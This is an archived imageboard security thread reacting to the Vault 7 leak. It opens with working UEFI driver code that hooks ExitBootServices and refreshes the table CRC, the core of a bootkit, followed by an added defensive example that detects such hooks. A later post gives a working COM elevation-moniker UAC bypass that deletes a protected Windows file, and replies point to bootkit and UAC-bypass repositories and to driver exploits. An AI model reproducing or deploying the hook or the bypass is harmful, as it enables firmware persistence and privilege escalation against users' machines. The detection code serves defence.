
lainchan archive - /sec/ - 4639



File: 1488937354757.png (3.84 MB, 204x204, fail.gif)

No.4639

#include <Uefi.h>
#include <Library/UefiBootServicesTableLib.h>   /* provides gBS */
#include <Library/MemoryAllocationLib.h>        /* AllocatePool / FreePool */
#include <Library/UefiLib.h>                    /* Print */

EFI_EXIT_BOOT_SERVICES gOrigExitBootServices;

/* Recompute the boot services table CRC after changing a pointer in it.
 * Loaders and firmware that verify Hdr.CRC32 will reject a table that was
 * patched without refreshing it. */
STATIC
VOID
RefreshBootServicesCrc (VOID)
{
  gBS->Hdr.CRC32 = 0;
  gBS->CalculateCrc32 (gBS, gBS->Hdr.HeaderSize, &gBS->Hdr.CRC32);
}

EFI_STATUS
EFIAPI
ExitBootServicesHook (
  IN EFI_HANDLE  ImageHandle,
  IN UINTN       MapKey
  )
{
  EFI_STATUS             Status;
  UINTN                  MemoryMapSize;
  EFI_MEMORY_DESCRIPTOR  *MemoryMap;
  UINTN                  LocalMapKey;
  UINTN                  DescriptorSize;
  UINT32                 DescriptorVersion;

  /* <hook related fun> */
  /* Do fun hook-related stuff here */
  /* </hook-related fun> */

  /* Fix the pointer in the boot services table (and its CRC).
   * If you don't do this, your hook can be called repeatedly when the OS
   * loader retries ExitBootServices, which you don't want. */
  gBS->ExitBootServices = gOrigExitBootServices;
  RefreshBootServicesCrc ();

  /* Get the memory map. Anything allocated above invalidated the MapKey the
   * caller passed in, so a fresh key must be fetched or the real
   * ExitBootServices fails with EFI_INVALID_PARAMETER. */
  MemoryMap      = NULL;
  MemoryMapSize  = 0;
  DescriptorSize = 0;

  do {
    Status = gBS->GetMemoryMap (&MemoryMapSize, MemoryMap, &LocalMapKey,
                                &DescriptorSize, &DescriptorVersion);
    if (Status == EFI_BUFFER_TOO_SMALL) {
      Print (L"This time through the memory map loop, status = %r\n", Status);
      /* The allocation itself can add descriptors, so free the old buffer
       * (instead of leaking one per pass) and pad the new one. */
      if (MemoryMap != NULL) {
        FreePool (MemoryMap);
      }
      MemoryMapSize += 2 * DescriptorSize;
      MemoryMap = AllocatePool (MemoryMapSize);
      if (MemoryMap == NULL) {
        return EFI_OUT_OF_RESOURCES;
      }
    }
  } while (Status == EFI_BUFFER_TOO_SMALL);

  if (EFI_ERROR (Status)) {
    return Status;
  }

  /* Nothing that may allocate belongs between here and the real call, or
   * LocalMapKey goes stale again. */
  return gOrigExitBootServices (ImageHandle, LocalMapKey);
}

EFI_STATUS
EFIAPI
HookDriverMain (
  IN EFI_HANDLE        ImageHandle,
  IN EFI_SYSTEM_TABLE  *SystemTable
  )
{
  /* Store off the original pointer and replace it with your own */
  gOrigExitBootServices = gBS->ExitBootServices;
  gBS->ExitBootServices = ExitBootServicesHook;
  RefreshBootServicesCrc ();

  /* It's hooked! Return EFI_SUCCESS so your driver stays in memory */
  return EFI_SUCCESS;
}

Think it works?
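
The check a defender would run against a hook like the one posted above, as an added example that is not from the thread and not EDK2 code: it models EFI_BOOT_SERVICES as a simplified struct (real 24-byte header layout, but only eight service slots), recomputes Hdr.CRC32 the way firmware's CalculateCrc32 does (standard IEEE CRC-32), and range-checks every service pointer against a firmware code window. The window 0xFF000000..0xFFFFFFFF, the hook address 0x7E000000 and slot 5 standing in for ExitBootServices are constructed values for the demo, not real addresses.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Simplified stand-in for EFI_TABLE_HEADER (same field layout, 24 bytes). */
typedef struct {
    uint64_t Signature;
    uint32_t Revision;
    uint32_t HeaderSize;   /* whole table size in bytes, as the UEFI spec defines it */
    uint32_t CRC32;
    uint32_t Reserved;
} TableHeader;

#define NUM_SERVICES 8     /* the real table has far more slots; enough to illustrate */

/* Simplified stand-in for EFI_BOOT_SERVICES: header followed by service pointers. */
typedef struct {
    TableHeader Hdr;
    uintptr_t   Services[NUM_SERVICES];
} BootServices;

/* Constructed demo values: firmware code window, hook target, hooked slot. */
#define FW_LO  ((uintptr_t)0xFF000000u)
#define FW_HI  ((uintptr_t)0xFFFFFFFFu)
#define HOOK_ADDR ((uintptr_t)0x7E000000u)       /* "driver image" outside the window */
#define EXIT_BOOT_SERVICES_INDEX 5                /* slot playing the role of ExitBootServices */

/* IEEE 802.3 CRC-32 (reflected polynomial 0xEDB88320), the algorithm
 * EFI_BOOT_SERVICES.CalculateCrc32 implements for table headers. */
uint32_t crc32_ieee(const void *data, size_t len) {
    const uint8_t *p = data;
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= p[i];
        for (int k = 0; k < 8; k++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* CRC the way firmware computes it: CRC32 field zeroed, over HeaderSize bytes. */
uint32_t table_crc(const BootServices *bs) {
    BootServices copy;
    memcpy(&copy, bs, sizeof copy);
    copy.Hdr.CRC32 = 0;
    return crc32_ieee(&copy, copy.Hdr.HeaderSize);
}

/* Check 1: stored CRC matches. A hook that forgot CalculateCrc32 fails here. */
int crc_is_valid(const BootServices *bs) {
    if (bs->Hdr.HeaderSize > sizeof *bs || bs->Hdr.HeaderSize < sizeof bs->Hdr)
        return 0;                       /* bogus size: treat as tampered */
    return table_crc(bs) == bs->Hdr.CRC32;
}

/* Check 2: every service pointer lies inside the firmware code window.
 * Returns the first out-of-range slot, or -1 if all are in range. This catches
 * a hook even when the attacker refreshed the CRC. */
int first_out_of_range(const BootServices *bs, uintptr_t lo, uintptr_t hi) {
    for (int i = 0; i < NUM_SERVICES; i++)
        if (bs->Services[i] < lo || bs->Services[i] >= hi)
            return i;
    return -1;
}

/* Bit 0: CRC valid, bit 1: all pointers in range. 3 means clean. */
int audit(const BootServices *bs) {
    int result = 0;
    if (crc_is_valid(bs)) result |= 1;
    if (first_out_of_range(bs, FW_LO, FW_HI) < 0) result |= 2;
    return result;
}

/* Build a clean table: real "BOOTSERV" signature, pointers inside the window. */
void build_clean_table(BootServices *bs) {
    memset(bs, 0, sizeof *bs);
    bs->Hdr.Signature  = 0x56524553544f4f42ull;   /* EFI_BOOT_SERVICES_SIGNATURE */
    bs->Hdr.Revision   = 0x0002001F;              /* sample revision */
    bs->Hdr.HeaderSize = (uint32_t)sizeof *bs;
    for (int i = 0; i < NUM_SERVICES; i++)
        bs->Services[i] = FW_LO + 0x1000u * (uintptr_t)(i + 1);
    bs->Hdr.CRC32 = table_crc(bs);
}

/* Install a hook the way the posted driver does, with or without fixing the CRC. */
void install_hook(BootServices *bs, uintptr_t hook_addr, int refresh_crc) {
    bs->Services[EXIT_BOOT_SERVICES_INDEX] = hook_addr;
    if (refresh_crc)
        bs->Hdr.CRC32 = table_crc(bs);
}

/* Full scenario: clean table, optionally hooked, returns the audit bits. */
int scenario(int hook, int refresh_crc) {
    BootServices bs;
    build_clean_table(&bs);
    if (hook) install_hook(&bs, HOOK_ADDR, refresh_crc);
    return audit(&bs);
}

int main(void) {
    printf("clean table:           audit=%d\n", scenario(0, 0));
    printf("hooked, stale CRC:     audit=%d\n", scenario(1, 0));
    printf("hooked, CRC refreshed: audit=%d\n", scenario(1, 1));
    return 0;
}
```

A hook that skips CalculateCrc32 fails both checks; one that refreshes the CRC passes the CRC check and still fails the pointer range check, which is why the range check is the one worth keeping. On real hardware the window would be taken from the EfiBootServicesCode and EfiRuntimeServicesCode regions of the memory map rather than hard-coded.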

  No.4640

File: 1488945031168.png (4.32 KB, 200x100, Oekaki.png)


  No.4641

So where do we go from here, lains? They're in everything. I was just making baby steps into security on the software side, and today I found out my best shot at cybersecurity would be to go Amish and throw out all my electronics.
Is there any hope if people can buy non-backdoored open hardware?

  No.4642

Uhm, if I can just interject. The source they 'leaked' is all on GitHub (I have links for proof too) and has been for years. This isn't cutting-edge malware, and I feel like you'd have a hard time breaching even a poorly updated (and pirated) copy of Win7. Like, the SetWindowsHookEx and COM UAC bypass were top kek.

There isn't much to worry about here; even using Windows you can get around all of it (update regularly and turn off the tragedy known as UAC).

  No.4644

>>4641
This sounds like my situation.
Other than going Amish, the only people who can really feel safe are those who know a lot about cybersecurity-related topics.

  No.4648

>>4642
The leaks include years of older stuff, not just the most recent

  No.4665

>>4642
UAC is easily bypassed, according to the leaks.

https://wikileaks.org/ciav7p1/cms/page_3375231.html

#include <windows.h>
#include <objbase.h>
#include <shobjidl.h>   // IFileOperation, IShellItem, CLSID_FileOperation
#include <strsafe.h>
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "shell32.lib")
#pragma comment(lib, "uuid.lib")

// Instantiate a COM class through the elevation moniker
// ("Elevation:Administrator!new:{CLSID}"). For a class registered with
// Elevation\Enabled = 1 this yields an elevated instance; it comes without a
// consent prompt only when the calling process itself passes the auto-elevation
// check (Windows-signed binary in a secure location), which is what the leaked
// tooling relies on.
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
    BIND_OPTS3 bo;
    WCHAR wszCLSID[50];
    WCHAR wszMon[300];

    StringFromGUID2(rclsid, wszCLSID, ARRAYSIZE(wszCLSID));
    HRESULT hr = StringCchPrintfW(wszMon, ARRAYSIZE(wszMon),
                                  L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr))
        return hr;

    memset(&bo, 0, sizeof(bo));
    bo.cbStruct = sizeof(bo);
    bo.hwnd = hwnd;
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;
    return CoGetObject(wszMon, &bo, riid, ppv);
}

// Use the elevated IFileOperation to delete a file the caller's
// medium-integrity token could not touch on its own.
void ElevatedDelete()
{
    MessageBoxW(NULL, L"DELETING", L"TESTING", MB_OK);

    // The elevation moniker is only available on Vista and higher
    HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    if (FAILED(hr))
        return;

    IFileOperation *pfo = NULL;
    hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
    if (SUCCEEDED(hr)) {
        pfo->SetOperationFlags(FOF_NO_UI);

        IShellItem *item = NULL;
        hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
        if (SUCCEEDED(hr)) {
            pfo->DeleteItem(item, NULL);
            pfo->PerformOperations();
            item->Release();
        }
        pfo->Release();
    }
    CoUninitialize();
}

  No.4666

File: 1489032617480.png (2.83 KB, 200x100, Oekaki.png)

>>4641
>Is there any hope if people can buy non-backdoored open hardware?
Yes, anon, this is possible. In fact, this hardware solution is so secure the CIA doesn't want you to know about it.

The most secure way to compute...
is with an abacus.

pros:
100% hack proof.
no known software vulnerabilities.
buffer overflow attacks do not affect operation.
immune to DDoS.
immune to botnets.
impossible to remotely access.

cons:
little to no support for additional hardware

  No.4671

>>4665

Like, and it has been for years. See:

https://github.com/hfiref0x/UACME

Like, all this soykaf is skid-level/very well-known 'hacks'.

  No.4686

>>4666
As of now I'm working on a physically implemented stack machine using marble balls. Once I figure out a decent, intuitive representation system, I'll publish the entire design under GPLv2 and the NSA will get destroyed by the power of the Free Software community.

  No.4694

>>4666
I'm not sure, lainon. It's not being maintained. There hasn't been a firmware update since 207 BCE. And this might just be me, but I had a lot of hardware problems with mine. I got it home and tested it and it was working fine, but after I riced it out with all my stickers it would only count in units of 2-3. This made decoding my high-bit-rate Chinese cartoons very difficult.

  No.4697

>>4671
This is probably why this section of code was released, and why none of the other code snippets have been released yet.

This was published because it's already publicly available. There are many snippets of code upcoming, though, which I would guess to be not so readily available.

  No.4698

>>4694
You need to backport your stickers. It sounds like their physical memory footprint is much too big.

Try optimizing the stickers to use a smaller footprint, and your abacus will likely be able to manage them better.

  No.4699

>>4671
Is there code on git for the above UEFI hack?

  No.4700

>>4699

UEFI bootkits have been a thing since 2012. Hacking Team's, I think, is what most of them are still based off of (but you're fuarrrking retarded to still use a UEFI kit in 2017; just find a kernel or (easier) third-party driver exploit).

https://github.com/quarkslab/dreamboot